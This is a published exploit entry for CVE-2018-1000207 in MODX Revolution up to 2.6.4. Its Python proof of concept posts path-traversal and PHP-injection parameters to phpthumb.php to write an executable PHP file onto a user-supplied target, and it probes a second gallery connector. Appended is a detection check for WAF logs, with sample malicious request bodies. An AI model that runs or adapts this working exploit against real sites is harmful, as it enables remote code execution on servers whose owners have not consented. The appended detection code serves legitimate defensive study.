Modx Revolution Remote Code Execution
Source: https://github.com/a2u  Author: Rudnykh  Published: 2018-07-19
# Exploit Title: Modx Revolution < 2.6.4 - Remote Code Execution
# Date: 2018-07-13
# Exploit Author: Vitalii Rudnykh
# Vendor Homepage: https://modx.com/
# Version: <= 2.6.4
# CVE : CVE-2018-1000207
 
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
import os
import requests
from colorama import init, Fore, Style
try:
    init()
 
    def cls():
        os.system('cls' if os.name == 'nt' else 'clear')
 
    cls()
 
    print(Fore.BLUE +
          '################################################################')
    print(Fore.CYAN +
          '# Proof-Of-Concept for CVE-2018-1000207 (Modx Revolution)')
    print('# by Vitalii Rudnykh')
    print('# Thanks by AgelNash')
    print('# https://github.com/a2u/CVE-2018-1000207/')
    print(Fore.BLUE +
          '################################################################')
    print('Provided only for educational or information purposes')
    print(Style.RESET_ALL)
    target = input('Enter target url (example: http(s)://domain.tld/): ')
 
    verify = True
    code = '<?php echo md5(\'a2u\'); unlink($_SERVER[\'SCRIPT_FILENAME\']);?>'

    if requests.get(
            target + '/connectors/system/phpthumb.php',
            verify=verify).status_code != 404:
        print(Fore.GREEN + '/connectors/system/phpthumb.php - found')

        url = target + '/connectors/system/phpthumb.php'
        payload = {
            'ctx': 'web',
            'cache_filename': '../../payload.php',
            'useRawIMoutput': '1',
            'src': '.',
            'IMresizedData': code,
            'config_prefer_imagemagick': '0'
        }

        r = requests.post(url, data=payload, verify=verify)
        check = requests.get(target + 'payload.php', verify=verify)
        if check.text == '9bdc11de19fd93975bf9c9ec3dd7292d':
            print(Fore.GREEN + 'Exploitable!\n')
        else:
            print(Fore.RED + 'Not exploitable!\n')
    else:
        print(Fore.RED + 'phpthumb.php - not found')

    if requests.get(
            target + '/assets/components/gallery/connector.php',
            verify=verify).status_code != 404:
        print(Fore.GREEN + '/assets/components/gallery/connector.php - found')

        url = target + '/assets/components/gallery/connector.php'
        payload = {
            'action': 'web/phpthumb',
            'f': 'php',
            'useRawIMoutput': '1',
            'IMresizedData': 'Ok',
            'config_prefer_imagemagick': '0'
        }

        r = requests.post(url, data=payload, verify=verify)
        if r.text == 'Ok':
            print(Fore.GREEN + 'Exploitable!\n')
        else:
            print(Fore.RED + 'Not exploitable!\n')
    else:
        print(
            Fore.RED + '/assets/components/gallery/connector.php - not found')

except KeyboardInterrupt:
    cls()
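
A detection check for the traffic the PoC above generates, added here as an example and not part of the original exploit or of MODX: it flags requests to the two connector paths that carry the parameters the script sends. It assumes a WAF or reverse-proxy audit log that records urlencoded request bodies; `inspect_request`, `WATCHED_PATHS` and the sample records are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# The two endpoints the PoC above probes.
WATCHED_PATHS = (
    "/connectors/system/phpthumb.php",
    "/assets/components/gallery/connector.php",
)

def inspect_request(method, url, body=""):
    """Return the reasons a request resembles the PoC's traffic ([] if none)."""
    parts = urlsplit(url)
    path = re.sub(r"/+", "/", parts.path)  # the PoC can emit '//connectors/...'
    if not path.endswith(WATCHED_PATHS):
        return []
    # Merge query-string and form parameters; the last value of each key wins.
    raw = parts.query + ("&" + body if method.upper() == "POST" else "")
    params = {k: v[-1] for k, v in parse_qs(raw, keep_blank_values=True).items()}
    reasons = []
    if "IMresizedData" in params:
        reasons.append("client-supplied IMresizedData")
        if "<?" in params["IMresizedData"]:
            reasons.append("PHP open tag in IMresizedData")
    if "cache_filename" in params:
        reasons.append("client-supplied cache_filename")
        segments = params["cache_filename"].replace("\\", "/").split("/")
        if ".." in segments:
            reasons.append("path traversal in cache_filename")
    if any(k.startswith("config_") for k in params):
        reasons.append("config_* override parameter")
    if params.get("f", "").lower() == "php":
        reasons.append("output format f=php")
    return reasons

# Constructed sample records (method, URL, urlencoded body); not real traffic.
SAMPLES = [
    ("POST", "https://cms.example//connectors/system/phpthumb.php",
     "ctx=web&cache_filename=..%2F..%2Fpayload.php&useRawIMoutput=1&src=."
     "&IMresizedData=%3C%3Fphp+echo+1%3B%3F%3E&config_prefer_imagemagick=0"),
    ("POST", "https://cms.example/assets/components/gallery/connector.php",
     "action=web%2Fphpthumb&f=php&useRawIMoutput=1&IMresizedData=Ok"
     "&config_prefer_imagemagick=0"),
    ("GET", "https://cms.example/connectors/system/phpthumb.php?src=logo.png&w=200", ""),
]

if __name__ == "__main__":
    for method, url, body in SAMPLES:
        print(method, urlsplit(url).path, "->", inspect_request(method, url, body) or "clean")
```

Plain access logs do not contain POST bodies, so this check belongs where the body is visible (WAF, reverse proxy, or application middleware).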

 